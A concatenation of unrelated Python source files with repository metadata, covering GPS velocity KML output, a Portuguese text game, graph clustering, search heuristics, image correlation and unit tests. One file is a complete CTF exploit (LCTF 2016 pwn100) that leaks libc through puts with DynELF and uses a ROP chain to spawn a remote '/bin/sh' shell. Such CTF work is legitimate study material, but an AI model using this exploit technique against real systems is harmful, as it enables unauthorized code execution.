    # Add the labels to the dataframe and then write the results
    df = df.assign(Label=labels)

    # Write outputs; this is a modified version of Mike Heflin's output format

    # Setup color map for markers (one hue per cluster label)
    norm = matplotlib.colors.Normalize(vmin=0, vmax=k, clip=False)
    mapper = cm.ScalarMappable(norm=norm, cmap=cm.hsv)

    # Start kml file
    outFile = open(args.output.partition('.')[0]+'.kml','w')
    print("<?xml version=\"1.0\" encoding=\"UTF-8\"?>",file=outFile)
    print("<kml xmlns=\"http://www.opengis.net/kml/2.2\">",file=outFile)
    print(" <Folder>",file=outFile)

    # Start kml file without vector markers
    outFileNoVec = open(args.output.partition('.')[0]+'_novector.kml','w')
    print("<?xml version=\"1.0\" encoding=\"UTF-8\"?>",file=outFileNoVec)
    print("<kml xmlns=\"http://www.opengis.net/kml/2.2\">",file=outFileNoVec)
    print(" <Folder>",file=outFileNoVec)

    # Start txt file
    txtFile = open(args.output.partition('.')[0]+'.txt','w')
    print("Site Lon Lat Delta E Delta N Delta V Sigma E Sigma N Sigma V Label",file=txtFile)

    # Add markers and vectors
    for i in range(0,df.shape[0]):
        lon = df.iat[i,1]
        lat = df.iat[i,2]
        vlon = df.iat[i,3]
        vlat = df.iat[i,4]
        vrad = df.iat[i,5]
        slon = df.iat[i,6]
        slat = df.iat[i,7]
        srad = df.iat[i,8]
        label = df.iat[i,9]

        # Set marker color
        rgba_color = mapper.to_rgba(label, bytes=True)
        markercolor = "#ff{:02x}{:02x}{:02x}".format(rgba_color[0],rgba_color[1],rgba_color[2])

        # Set scale, assuming default from getVelocities
        scale = 320

        # Draw markers for kml output
        print(" <Placemark>",file=outFile)
        print(" <description><![CDATA[",file=outFile)
        print(" <a href=\"http://sideshow.jpl.nasa.gov/post/links/{:s}.html\">".format(df.iat[i,0]),file=outFile)
        print(" <img src=\"http://sideshow.jpl.nasa.gov/post/plots/{:s}.jpg\" width=\"300\" height=\"300\">".format(df.iat[i,0]),file=outFile)
        print(" </a>",file=outFile)
        print(" ]]></description>",file=outFile)
        print(" <Style><IconStyle>",file=outFile)
        print(" <color>{:s}</color>".format(markercolor),file=outFile)
        print(" <scale>0.50</scale>",file=outFile)
        print(" <Icon><href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href></Icon>",file=outFile)
        print(" </IconStyle></Style>",file=outFile)
        print(" <Point>",file=outFile)
        print(" <coordinates>",file=outFile)
        print(" {:f},{:f},0".format(lon,lat),file=outFile)
        print(" </coordinates>",file=outFile)
        print(" </Point>",file=outFile)
        print(" </Placemark>",file=outFile)

        # Draw markers for kml output w/o vectors
        print(" <Placemark>",file=outFileNoVec)
        print(" <description><![CDATA[",file=outFileNoVec)
        print(" <a href=\"http://sideshow.jpl.nasa.gov/post/links/{:s}.html\">".format(df.iat[i,0]),file=outFileNoVec)
        print(" <img src=\"http://sideshow.jpl.nasa.gov/post/plots/{:s}.jpg\" width=\"300\" height=\"300\">".format(df.iat[i,0]),file=outFileNoVec)
        print(" </a>",file=outFileNoVec)
        print(" ]]></description>",file=outFileNoVec)
        print(" <Style><IconStyle>",file=outFileNoVec)
        print(" <color>{:s}</color>".format(markercolor),file=outFileNoVec)
        print(" <scale>0.50</scale>",file=outFileNoVec)
        print(" <Icon><href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href></Icon>",file=outFileNoVec)
        print(" </IconStyle></Style>",file=outFileNoVec)
        print(" <Point>",file=outFileNoVec)
        print(" <coordinates>",file=outFileNoVec)
        print(" {:f},{:f},0".format(lon,lat),file=outFileNoVec)
        print(" </coordinates>",file=outFileNoVec)
        print(" </Point>",file=outFileNoVec)
        print(" </Placemark>",file=outFileNoVec)

        # Draw vectors (velocity scaled down by `scale` in degrees)
        print(" <Placemark>",file=outFile)
        print(" <Style><LineStyle>",file=outFile)
        print(" <color>{:s}</color>".format(markercolor),file=outFile)
        print(" <width>2</width>",file=outFile)
        print(" </LineStyle></Style>",file=outFile)
        print(" <LineString>",file=outFile)
        print(" <coordinates>",file=outFile)
        print(" {:f},{:f},0".format(lon,lat),file=outFile)
        print(" {:f},{:f},0".format(lon+vlon/scale,lat+vlat/scale),file=outFile)
        print(" </coordinates>",file=outFile)
        print(" </LineString>",file=outFile)
        print(" </Placemark>",file=outFile)

        # Draw sigmas (uncertainty ellipse approximated by a 16-point ring)
        print(" <Placemark>",file=outFile)
        print(" <Style>",file=outFile)
        print(" <LineStyle>",file=outFile)
        print(" <color>{:s}</color>".format(markercolor),file=outFile)
        print(" <width>2</width>",file=outFile)
        print(" </LineStyle>",file=outFile)
        print(" <PolyStyle>",file=outFile)
        print(" <color>{:s}</color>".format(markercolor),file=outFile)
        print(" <fill>0</fill>",file=outFile)
        print(" </PolyStyle>",file=outFile)
        print(" </Style>",file=outFile)
        print(" <Polygon>",file=outFile)
        print(" <outerBoundaryIs>",file=outFile)
        print(" <LinearRing>",file=outFile)
        print(" <coordinates>",file=outFile)
        theta = 0
        for k in range(0,16):
            angle = k/15*2*math.pi
            elon = slon*math.cos(angle)*math.cos(theta)-slat*math.sin(angle)*math.sin(theta)
            elat = slon*math.cos(angle)*math.sin(theta)+slat*math.sin(angle)*math.cos(theta)
            elon = (elon+vlon)/scale
            elat = (elat+vlat)/scale
            print("      {:f},{:f},0".format(lon+elon,lat+elat),file=outFile)
        print("     </coordinates>",file=outFile)
        print("    </LinearRing>",file=outFile)
        print("   </outerBoundaryIs>",file=outFile)
        print("  </Polygon>",file=outFile)
        print(" </Placemark>",file=outFile)

        # Make table
        print("{:s} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12d}".format(df.iat[i,0],lon,lat,vlon,vlat,vrad,slon,slat,srad,label),file=txtFile)

    # Finish kml file
    print(" </Folder>",file=outFile)
    print("</kml>",file=outFile)
    outFile.close()
    txtFile.close()

    # Finish kml file w/o vectors
    print(" </Folder>",file=outFileNoVec)
    print("</kml>",file=outFileNoVec)
    # Bug fix: this used to re-close outFile/txtFile and never closed
    # outFileNoVec, which could leave its contents unflushed.
    outFileNoVec.close()
# Script entry point.
if __name__ == '__main__':
    main()
| true |
04ef24e6b896b641acdee30f575a8e8b0a9921fd | Python | Manguinhos-HacktoberFest-2019/rpg | /src/phases/escolhas.py | UTF-8 | 2,278 | 3.890625 | 4 | [] | no_license | #Autor: Joao Pedro Garcia Pereira
def escolhas():
    """Interactive (Portuguese) text adventure; returns True unless all
    retries are exhausted (see NOTE at the bottom)."""
    def validador(resposta):
        # Re-prompt until the player enters 1 or 2.
        while resposta!=1 and resposta !=2:
            print("Esta não é uma resposta válida, tente novamente")
            resposta=int(input("Oque você deseja? (1 ou 2): "))
        return resposta
    gameover=4   # remaining attempts
    restart=1    # set back to 1 on a game-over retry
    while restart==1 and gameover>0:
        restart=0
        gameover=gameover-1
        print("Após uma longa jornada de aventura... \n")
        print("você (como um bom aventureiro programador), resolve ir tomar um café")
        print("Enquanto caminhava você observa pessoas mascaradas saindo da cafeteria...\n")
        print("É UM ASSALTO!!!\n")
        print("Essa não, os assaltantes mascarados roubaram todos os sacos de café! Oque deseja fazer? (1 ou 2)\n\n\n")
        print("Correr atrás dos assaltantes (Alguem que rouba café não pode sair impune) (1)   Ir em uma outra cafeteria (2)\n")
        resposta=int(input())
        resposta=validador(resposta)
        if resposta==2:
            # Choice 2: game over, offer a retry.
            print("Aparentemente aquela não era a única cafeteria que foi roubada, todas estão sem café")
            print("Você ficou sem café e todo mundo sabe que não é possível programar sem café\n\n\n")
            print("GAME OVER\n\n")
            restart=int(input("Digite 1 para tentar novamente! %d tentativas restantes: "%gameover))
        else:
            # Choice 1: chase the robbers; a second decision follows.
            print("Por algum motivo o seu instinto de amante de café, faz você correr atrás dos mascarados")
            print("Enquanto corria você vê um menino com uma bicicleta. O que deseja fazer? (1 ou 2)\n\n\n")
            print("Roubar a bicicleta (afinal tudo por CAFÉ) (1)    Continuar correndo (2)" )
            resposta=int(input())
            resposta=validador(resposta)
            if resposta==1:
                print("Você rouba a bicicleta e consegue atropelar um dos assaltantes")
                print("Porém aquele menino era filho de um policial, que conseguiu chegar até você\n")
                print("VOCÊ ESTÁ PRESO!!!")
                print("...\n")
                print("........\n")
                print("............................................\n")
                print("Você está preso mas tem seu precioso cafe, então considere uma vitória!!")
            else:
                print("Você continua correndo até que um dos assaltantes acaba deixando cair um saco")
                print("Você leva de volta para a cafeteria, todos te chamam de herói e ganham uma rodada grátis de café!!\n\n")
                print("BIG WIN!")
    # NOTE(review): gameover is decremented from 4 and the loop stops at 0,
    # so gameover < 0 looks unreachable and this function appears to always
    # return True — confirm the intended "out of attempts" condition.
    if gameover<0:
        return False
    else:
        return True
| true |
f30956d9347d6a0390de7fd0ce6ff2f5166d2e84 | Python | recursecenter/recurse-lisp-workshop | /lisp/src/nodes/program.py | UTF-8 | 322 | 3.140625 | 3 | [] | no_license | class Program(object):
def __init__(self, expressions):
self.expressions = expressions
def __repr__(self):
return '\n'.join([x.__repr__() for x in self.expressions])
def evaluate(self, scope):
results = [expr.evaluate(scope) for expr in self.expressions]
return results.pop()
| true |
c92ee149b0ac5781a84718b80b207e665c33788e | Python | PIG-007/CTF | /PWN/0x05-Leak_libc/LCTF 2016-pwn100_without_libc/pwn100_without_libc.py | UTF-8 | 2,927 | 2.625 | 3 | [] | no_license | #!/usr/bin/python
#coding:utf-8
from pwn import *
# Target connection and static addresses taken from the pwn100 binary.
io = remote("172.17.0.3", 10001)
elf = ELF("./pwn100")
puts_addr = elf.plt['puts']
read_got = elf.got['read']
start_addr = 0x400550
pop_rdi = 0x400763
pop6_addr = 0x40075a # universal gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
mov_call_addr = 0x400740 # universal gadget 2: mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c # .bss holds the STDIN/STDOUT FILE structs (writing there crashes), so use this fixed writable address instead
def leak(addr):
    """Leak memory at *addr* via ROP-to-puts; returns 4 bytes for DynELF."""
    count = 0
    up = ''
    content = ''
    payload = 'A'*72 #padding
    payload += p64(pop_rdi) #set up puts()'s argument register
    payload += p64(addr) #the addr parameter of this leak function
    payload += p64(puts_addr) #call puts()
    payload += p64(start_addr) #jump back to _start to reset the stack
    payload = payload.ljust(200, 'B') #padding
    io.send(payload)
    io.recvuntil("bye~\n")
    while True: #read in a loop so recv() can't truncate the output
        c = io.recv(numb=1, timeout=0.1) #one byte at a time; the timeout guarantees nothing is missed
        count += 1
        if up == '\n' and c == "": #previous char was newline and nothing more arrives: done reading
            content = content[:-1]+'\x00' #replace the final character with \x00
            break
        else:
            content += c #append to the output
            up = c #remember the last character
    content = content[:4] #keep a 4-byte slice as the return value for DynELF
    log.info("%#x => %s" % (addr, (content or '').encode('hex')))
    return content
# Resolve system() in libc using the leak primitive, then build the ROP chain.
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
log.info("system_addr = %#x", system_addr)

payload = "A"*72 #padding
payload += p64(pop6_addr) #universal gadget 1
payload += p64(0) #rbx = 0
payload += p64(1) #rbp = 1, satisfies the check after universal gadget 2's call returns
payload += p64(read_got) #r12 = read's GOT slot (holds read's real address); gadget 2 calls qword ptr [r12+rbx*8]
payload += p64(8) #r13 = 8, byte count for read(); gadget 2 moves it into rdx
payload += p64(binsh_addr) #r14 = buffer where read() stores "/bin/sh"; gadget 2 moves it into rsi
payload += p64(0) #r15 = 0, read()'s fd (STDIN); gadget 2 moves it into edi
payload += p64(mov_call_addr) #universal gadget 2
payload += '\x00'*56 #gadget 2 is followed by a check and then gadget 1 again; this fills that stack frame
payload += p64(start_addr) #jump back to _start to reset the stack
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.recvuntil('bye~\n')
io.send("/bin/sh\x00") #the payload above invoked read(); send the string it reads
payload = "A"*72 #padding
payload += p64(pop_rdi) #set up system()'s argument
payload += p64(binsh_addr) #rdi = &("/bin/sh\x00")
payload += p64(system_addr) #call system("/bin/sh")
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.interactive()
d9c11009af9f8f9b53a04fb67fe358e7e4ec1c5a | Python | marielribes2/python_samples | /test.py | UTF-8 | 143 | 2.640625 | 3 | [
"MIT"
] | permissive |
def printhellofivetimes():
    """Print the word "hello" on five consecutive lines."""
    for _ in range(5):
        print("hello")


printhellofivetimes()
printhellofivetimes()
printhellofivetimes()
1ace316cef46ebd59649586bc4e8ae4ca080a4d3 | Python | github/codeql | /python/ql/test/experimental/library-tests/CallGraph/code/runtime_decision_defns.py | UTF-8 | 131 | 2.6875 | 3 | [
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] | permissive | import random
# `func4` gets one of two alternative bodies, chosen by a coin flip at import
# time. Appears to be a static-analysis (call graph) test fixture — the code
# itself must stay exactly as written.
if random.random() < 0.5:
    def func4():
        print("func4 A")
else:
    def func4():
        print("func4 B")
| true |
622ef4236a8ce4af3941e875cfe8076ef5ee673e | Python | jianyu-m/comp9102-assignment3 | /cluster.py | UTF-8 | 3,749 | 2.859375 | 3 | [] | no_license | import numpy
from sklearn.cluster import KMeans as kmeans
import math
N = 18576   # number of graph nodes; adjacency and rank matrices are N x N
alpha = .1  # restart/teleport weight in the power iteration below
def log_e(d, e):
    """Entropy term -(d/e) * ln(d/e), using the 0*log(0) == 0 convention."""
    if d == 0:
        return 0
    return -(d / e) * math.log(d / e)
def log_ce(wc, w, c, n):
    """Mutual-information term (wc/n) * log2(n*wc / (w*c)).

    Returns 0 when the joint count wc is 0 (the 0*log(0) == 0 convention,
    matching log_e's guard). Previously this tested the module-level
    constant N (always 18576), so a zero wc crashed math.log2.
    """
    if wc == 0:
        return 0
    else:
        return wc / n * math.log2(n * wc / (w * c))
if __name__ == "__main__":
    # Build a symmetric 0/1 adjacency matrix from the edge list (1-indexed ids).
    arr = numpy.zeros((N, N))
    with open("Graph.txt") as f:
        line = " "
        while len(line) > 0:
            line = f.readline()
            if len(line) <= 0:
                break
            linarr = line.split(" ")
            fr, to = int(linarr[0]), int(linarr[1])
            arr[fr - 1][to - 1] = 1
            arr[to - 1][fr - 1] = 1
    # Small hand-checked example kept for debugging:
    # N = 100
    # arr = numpy.array([[0, 1, 0, 1, 1],
    #                    [1, 0, 0, 0, 1],
    #                    [0, 0, 0, 1, 1],
    #                    [1, 0, 1, 0, 0],
    #                    [1, 1, 1, 0, 0]])
    # A: column-normalized transition matrix (column j sums to 1 over j's edges).
    A = numpy.zeros((N, N))
    sum_all = [sum(arr[i]) for i in range(N)]
    for i in range(N):
        for j in range(N):
            if arr[i][j] == 1:
                A[i][j] = 1 / sum_all[j]
            else:
                A[i][j] = 0
    # e: row-normalized restart matrix; p: rank matrix iterated below.
    e = numpy.zeros((N, N))
    p = numpy.zeros((N, N))
    for i in range(N):
        for j in range(N):
            if arr[i][j] == 1:
                e[i][j] = 1 / sum_all[i]
            else:
                e[i][j] = 0
    itr = 10  # NOTE(review): unused; the loop runs until convergence instead
    convergence = 10e-5  # i.e. 1e-4, threshold on the squared update norm
    tmp = 100
    print("start")
    # Power iteration: p <- (1-alpha) * A p + alpha * e, until the change is small.
    while tmp > convergence:
        print("iter start")
        p_now = (1 - alpha) * numpy.dot(A, p) + alpha * e
        print("iter fin")
        tmp = sum(sum((p_now - p)**2))
        p = p_now
        print(str(tmp))
    p.dump("parr")  # pickle the converged matrix to disk
    # Two-way k-means on the rows of p.
    points = kmeans(2).fit(p)
    # compute purity
    labels = {}
    with open("Labels.txt") as f:
        line = " "
        while len(line) > 0:
            line = f.readline()
            if len(line) == 0:
                break
            point = int(line.split(" ")[0])
            label = int(line.split(" ")[1])
            labels[point] = label
    # Confusion counts per cluster (ground-truth label 0 -> Clinton, 1 -> Trump).
    class_0 = {"Clinton": 0, "Trump": 0}
    class_1 = {"Clinton": 0, "Trump": 0}
    total = 0
    # NOTE(review): the loop variable p shadows the rank matrix p above.
    for idx, p in enumerate(points.labels_):
        total += 1
        if idx not in labels:
            continue
        if p == 0:
            if labels[idx] == 0:
                class_0["Clinton"] += 1
            else:
                class_0["Trump"] += 1
        else:
            if labels[idx] == 0:
                class_1["Clinton"] += 1
            else:
                class_1["Trump"] += 1
    # Majority label of each cluster.
    if class_0["Clinton"] > class_0["Trump"]:
        class_0_label = "Clinton"
    else:
        class_0_label = "Trump"
    if class_1["Clinton"] > class_1["Trump"]:
        class_1_label = "Clinton"
    else:
        class_1_label = "Trump"
    # NOTE(review): total counts every point, including unlabeled ones skipped
    # above — confirm that is the intended purity denominator.
    purity = (class_0[class_0_label] + class_1[class_1_label]) / total
    # compute entropy
    class_0_total = 0
    for k, v in class_0.items():
        class_0_total += v
    class_1_total = 0
    for k, v in class_1.items():
        class_1_total += v
    entropy = log_e(class_0_total, total) + log_e(class_1_total, total)
    # compute NMI
    clinton = class_0["Clinton"] + class_1["Clinton"]
    trump = class_0["Trump"] + class_1["Trump"]
    HC = log_e(clinton, total) + log_e(trump, total)
    # Mutual information between cluster assignment and ground-truth label.
    ioc = log_ce(class_0["Trump"], class_0_total, trump, total) \
        + log_ce(class_0["Clinton"], class_0_total, clinton, total) \
        + log_ce(class_1["Trump"], class_1_total, trump, total) \
        + log_ce(class_1["Clinton"], class_1_total, clinton, total)
    NMI = ioc / ((entropy + HC) / 2)
    print("purity " + str(purity))
    print("entropy " + str(entropy))
    print("nmi " + str(NMI))
| true |
10113a3f5a093941ab8d3c3b7a1e788390ed42c3 | Python | karthik-dasari/Python-programs | /Program to Convert Kilometers to Miles.py | UTF-8 | 166 | 4.34375 | 4 | [] | no_license | #Python Program to Convert Kilometers to Miles
# One kilometre equals 0.621371 miles.
MILES_PER_KM = 0.621371
km_value = float(input("Enter value in kilometers: "))
distance_miles = km_value * MILES_PER_KM
print("in miles=", distance_miles)
266dee29465c16d4e6ba56d52efb311d3d016265 | Python | Codaone/python-bitshares | /tests/test_txbuffers.py | UTF-8 | 3,179 | 2.546875 | 3 | [
"MIT"
] | permissive | import unittest
from bitsharesbase import operations
from .fixtures import fixture_data, bitshares
class Testcases(unittest.TestCase):
    def setUp(self):
        # Reload the shared blockchain fixture data before every test.
        fixture_data()
def test_add_one_proposal_one_op(self):
tx1 = bitshares.new_tx()
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
proposal1.appendOps(op)
tx = tx1.json()
self.assertEqual(tx["operations"][0][0], 22)
self.assertEqual(len(tx["operations"]), 1)
ps = tx["operations"][0][1]
self.assertEqual(len(ps["proposed_ops"]), 1)
self.assertEqual(ps["proposed_ops"][0]["op"][0], 0)
def test_add_one_proposal_two_ops(self):
tx1 = bitshares.new_tx()
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
proposal1.appendOps(op)
proposal1.appendOps(op)
tx = tx1.json()
self.assertEqual(tx["operations"][0][0], 22)
self.assertEqual(len(tx["operations"]), 1)
ps = tx["operations"][0][1]
self.assertEqual(len(ps["proposed_ops"]), 2)
self.assertEqual(ps["proposed_ops"][0]["op"][0], 0)
self.assertEqual(ps["proposed_ops"][1]["op"][0], 0)
def test_have_two_proposals(self):
tx1 = bitshares.new_tx()
# Proposal 1
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
for i in range(0, 3):
proposal1.appendOps(op)
# Proposal 1
proposal2 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 5555555, "asset_id": "1.3.0"},
"prefix": "TEST"
})
for i in range(0, 2):
proposal2.appendOps(op)
tx = tx1.json()
self.assertEqual(len(tx["operations"]), 2) # 2 proposals
# Test proposal 1
prop = tx["operations"][0]
self.assertEqual(prop[0], 22)
ps = prop[1]
self.assertEqual(len(ps["proposed_ops"]), 3)
for i in range(0, 3):
self.assertEqual(ps["proposed_ops"][i]["op"][0], 0)
# Test proposal 2
prop = tx["operations"][1]
self.assertEqual(prop[0], 22)
ps = prop[1]
self.assertEqual(len(ps["proposed_ops"]), 2)
for i in range(0, 2):
self.assertEqual(ps["proposed_ops"][i]["op"][0], 0)
| true |
9711c5409e0e067496c738588a22609771b1de5a | Python | muhilvarnan/flask-serverless | /tests/test_modules/test_service_now.py | UTF-8 | 521 | 2.640625 | 3 | [] | no_license | """
Unit test for service now
"""
import unittest
import mock
from modules import service_now
from mock_data import books
@mock.patch('modules.service_now.requests.get')
class ServiceNowTest(unittest.TestCase):
    def test_get_books(self, mock_get):
        """
        get_books should return the payload of the (mocked) HTTP response
        """
        mock_get.return_value.json.return_value = books
        mock_get.return_value.ok = True
        adapter = service_now.Adapater("https://www.booknomads.com")
        self.assertEqual(adapter.get_books(), books)
| true |
1d72eae046be42cb6aca45b7cb3a6a7d879f2eb1 | Python | wyaadarsh/LeetCode-Solutions | /Python3/1091-Shortest-Path-in-Binary-Matrix/soln-1.py | UTF-8 | 982 | 2.828125 | 3 | [
"MIT"
] | permissive | class Solution:
def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:
if grid[0][0] == 1:
return -1
def neighbor8(i, j):
n = len(grid)
for di in (-1, 0, 1):
for dj in (-1, 0, 1):
if di == dj == 0:
continue
newi, newj = i + di, j + dj
if 0 <= newi < n and 0 <= newj < n and grid[newi][newj] == 0:
yield (newi, newj)
n = len(grid)
ds = [[math.inf] * n for _ in range(n)]
queue = collections.deque([(0, 0)])
ds[0][0] = 1
while queue:
i, j = queue.popleft()
if i == j == n - 1:
return ds[n - 1][n - 1]
for newi, newj in neighbor8(i, j):
if ds[i][j] + 1 < ds[newi][newj]:
ds[newi][newj] = ds[i][j] + 1
queue.append((newi, newj))
return -1
| true |
089d2dbbdaf60ae4a62fd9ea347b5d2eac1d1d48 | Python | AkiLotus/AkikazeCP | /Vault/Codeforces Gyms-VPs/2017-2018 ACM-ICPC Pacific Northwest Regional Contest (Div. 1)/J.py | UTF-8 | 1,602 | 3.015625 | 3 | [] | no_license | import sys
# Python 2 script (print statements): read an m x n board of characters and
# derive per-row / per-column extents from 'R' and 'B' markers, flagging
# inconsistent inputs.
m, n = map(int, sys.stdin.readline().split())
# NOTE(review): all four lists are filled m times below, but the *InCol
# lists are indexed by column (0..n-1); this looks broken when m != n -
# confirm against the problem statement.
minimumInCol = []
maximumInCol = []
minimumInRow = []
maximumInRow = []
invalid = False
for i in range(0, m):
	minimumInCol.append(m)
	maximumInCol.append(-1)
	minimumInRow.append(n)
	maximumInRow.append(-1)
board = []
for i in range(0, m):
	# NOTE: shadows the builtin input(); pop() drops the trailing newline.
	input = list(sys.stdin.readline())
	input.pop()
	for j in range(0, n):
		if invalid:
			break
		if input[j] == 'R':
			# An 'R' caps the maximum extent of every later row / column
			# that has not been capped yet.
			for i_ in range(i, m):
				if maximumInRow[i_] == -1:
					maximumInRow[i_] = j
			for j_ in range(j, n):
				if maximumInCol[j_] == -1:
					maximumInCol[j_] = i
		elif input[j] == 'B':
			# A 'B' must lie inside the capped extents of all earlier
			# rows / columns; otherwise the board is inconsistent.
			for i_ in range(0, i+1):
				if maximumInRow[i_] <= j and maximumInRow[i_] != -1:
					print "invalid at:"
					print i,j
					print "invalid caused by i = ", i_
					invalid = True
					break
				else:
					minimumInRow[i_] = j
			for j_ in range(0, j+1):
				if maximumInCol[j_] <= i and maximumInCol[j_] != -1:
					print "invalid at:"
					print i,j
					print "invalid caused by j = ", j_
					invalid = True
					break
				else:
					minimumInCol[j_] = i
	board.append(input)
if invalid:
	print 0
else:
	# Debug dump of the derived extents and the parsed board.
	print minimumInRow
	print maximumInRow
	print minimumInCol
	print maximumInCol
	print board
1a0eb9924f4404ca06f9a3b792cc077596000129 | Python | sixfwa/computational-intelligence-cw | /lab-sign-off/python_code/algorithms.py | UTF-8 | 2,585 | 3.53125 | 4 | [] | no_license | import time
import random
from utils import shortest_tour, swap_elements, sorted_tours
# Parameters: a CompleteGraph and a time limit in seconds
def random_search(graph, limit):
    """Sample random tours of `graph` for `limit` seconds.

    Returns the result of utils.shortest_tour over every distinct tour
    seen, i.e. the (tour, cost) of the best random tour.

    Fix: the original fetched graph.number_of_tours() into a local that
    was never used; that dead call is removed.  The redundant membership
    test before the dict assignment is dropped too - re-assigning the
    same key with the same (deterministic) cost is a no-op.
    """
    tours = {}  # {tour (tuple): cost (float)}
    finish = time.time() + limit
    while time.time() < finish:
        tour = graph.random_tour()
        tours[tour] = graph.get_tour_cost(tour)
    return shortest_tour(tours)
# Takes a tour as input and returns the 2-opt neighbourhood of
# the tour as output
def two_opt_neighbourhood(tour):
    """Return the 2-opt neighbourhood of `tour`: every distinct tour
    produced by swapping a pair of positions, excluding the tour itself
    and reversals of tours already collected."""
    neighbours = []
    size = len(tour)
    for first in range(size):
        for second in range(size):
            candidate = swap_elements(tour, first, second)
            if candidate == tour:
                continue
            if candidate in neighbours or candidate[::-1] in neighbours:
                continue
            neighbours.append(candidate)
    return neighbours
# Best Neighbour Step Function
# Takes a neighbourhood (with the same structure as that returned by the two opt function)
# and returns the shortest tour in the neighbourhood
def best_neighbourhood(graph, tour):
    """Return the shortest tour (per utils.shortest_tour) among the
    2-opt neighbours of `tour`."""
    costs = {neighbour: graph.get_tour_cost(neighbour)
             for neighbour in two_opt_neighbourhood(tour)}
    return shortest_tour(costs)
# Combining the above algorithms.
# After generating a random tour it should repeatedly try to make
# the best local improving move. When a local optimum is reached,
# it should generate a new random solution and start the local
# search procedure from there. This process should continue until
# the set time limit expires.
def local_search(graph, limit):
    """2-opt hill climbing with random restarts until `limit` seconds
    elapse; returns utils.shortest_tour over the improving tours found."""
    current = graph.random_tour()
    current_cost = graph.get_tour_cost(current)
    improvements = {}
    finish = time.time() + limit
    while time.time() < finish:
        candidate = best_neighbourhood(graph, current)[0]
        candidate_cost = graph.get_tour_cost(candidate)
        if candidate_cost < current_cost:
            # Accept the improving neighbour and remember it.
            current, current_cost = candidate, candidate_cost
            improvements[current] = current_cost
        else:
            # Local optimum: restart from a fresh random tour.
            current = graph.random_tour()
            current_cost = graph.get_tour_cost(current)
    return shortest_tour(improvements)
| true |
d71c5d068d9be02152dfa5554dacfcd5609c5337 | Python | atturaioe/digital-image-correlation | /correlation.py | UTF-8 | 2,115 | 3.015625 | 3 | [] | no_license | import numpy as np
from PIL import Image
import argparse
def standardize(arr):
    """Apply standardization to the given array.

    Subtracts the mean and divides by the L2 norm of the centred values.

    Fix: a constant array has zero norm; return an all-zero array in
    that case instead of dividing by zero, which propagated NaNs into
    the correlation map for constant patches (e.g. zero padding).
    """
    standardized = arr - np.mean(arr)
    norm = np.linalg.norm(standardized)  # L2 norm
    if norm == 0:
        return np.zeros_like(standardized)
    return standardized / norm
def rescale(arr):
    """Min-max normalization. Rescale given array to values in range [0, 1].

    Fix: a constant array has zero range; return all zeros instead of
    dividing by zero.
    """
    span = arr.max() - arr.min()
    if span == 0:
        return np.zeros_like(arr, dtype=float)
    return (arr - arr.min()) / span
def pad(temp_size):
    """Return the (before, after) padding sizes for a template dimension.

    For an odd template size the padding is symmetric; for an even size
    the extra pixel goes on the leading side (ceil, floor).

    Fix: the original branched on `padding % 2 == 0`, a parity test on
    the padding value that only coincidentally produced the right
    answers; (ceil, floor) covers both cases uniformly and is
    behavior-identical for every input.
    """
    padding = (temp_size - 1) / 2
    return int(np.ceil(padding)), int(np.floor(padding))
def correlation2D(image, template):
    """Normalized cross-correlation of `template` slid over `image`.

    The image is zero-padded so the result has the same shape as the
    input image."""
    # TODO make rotated and scaled template sliding
    assert image.shape > template.shape, 'Template is bigger than image'
    img_h, img_w = image.shape
    temp_h, temp_w = template.shape
    norm_template = standardize(template)
    padded = np.pad(image, (pad(temp_h), pad(temp_w)))
    result = np.zeros(image.shape)
    for row in range(img_h):
        for col in range(img_w):
            window = padded[row:row + temp_h, col:col + temp_w]
            assert window.shape == norm_template.shape, 'Patch and and template should be the same size'
            result[row, col] = np.sum(standardize(window) * norm_template)
    return result
def parse_args():
    """Parse the CLI options: required paths to the image and template."""
    parser = argparse.ArgumentParser(description='2D grayscale cross-correlation')
    for option in ('--image', '--template'):
        parser.add_argument(option, type=str, required=True)
    return parser.parse_args()
def main():
    """Load both inputs as grayscale, correlate them, and save the
    rescaled result as 'correlated.png'."""
    args = parse_args()
    image = np.copy(np.asarray(Image.open(args.image).convert('L')))
    template = np.copy(np.asarray(Image.open(args.template).convert('L')))
    corr = correlation2D(image, template)
    Image.fromarray(np.uint8(rescale(corr) * 255)).save('correlated.png', 'PNG')
# Script entry point: run the correlation CLI when executed directly.
if __name__ == '__main__':
    main()
| true |
0b071b48624b033bc94b648093af08bbdfa325f2 | Python | deepbaksu/DFAB-Trello-automation | /card_archiver.py | UTF-8 | 1,440 | 2.671875 | 3 | [] | no_license | import re
from datetime import date
from common import utils
class DoneCardsArchiver:
    """Moves finished Trello cards into a dated archive list.

    Constructor arguments are validated eagerly; `team_info` must carry
    'start_ym' ("yyyy-mm") and 'organ_name', and `today` must be a
    datetime.date.
    """

    def __init__(self, team_info, today):
        self.team_info = team_info
        self.today = today
        self._check_valid_init_input()

